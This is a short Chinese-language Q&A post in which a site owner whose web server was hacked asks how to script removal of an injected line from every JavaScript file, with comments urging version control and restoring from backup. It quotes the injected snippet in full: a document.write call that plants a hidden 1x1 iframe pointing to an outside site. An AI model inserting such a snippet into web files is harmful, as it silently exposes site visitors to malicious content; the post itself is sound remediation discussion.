【发布时间】:2011-09-09 17:06:05
【问题描述】:
问题:
我有最近被入侵的网络服务器。他们针对 javascript 文件。他们插入了以下sn-p
document.write('<iframe src="http://lcbmc.co.uk/showthread.php?t=31540750" width="1" height="1" frameborder="0"></iframe>')
这被添加到服务器上每个 .js 文件的顶部。
解决方案:
编写一个脚本来打开我服务器上的每个 javascript 文件,检查恶意代码,删除恶意代码,最后保存文件。
问题:
脚本应该用什么编程语言编写?蟒蛇会工作吗?我在我的服务器上运行 python 2.4.3。如果我在 root 下运行 python 脚本,我是否会担心意外更改修改文件的所有者权限?
谢谢
【问题讨论】:
-
虽然现在作为建议有点晚了:使用版本控制。如果你有,你就可以在黑客攻击前的状态下重新部署你的最新版本。
-
从备份中恢复,但是你真的很舒服只是修复 .js 文件。如何确定攻击者没有修改任何其他文件或在某处留下后门?
标签: python perl bash scripting sed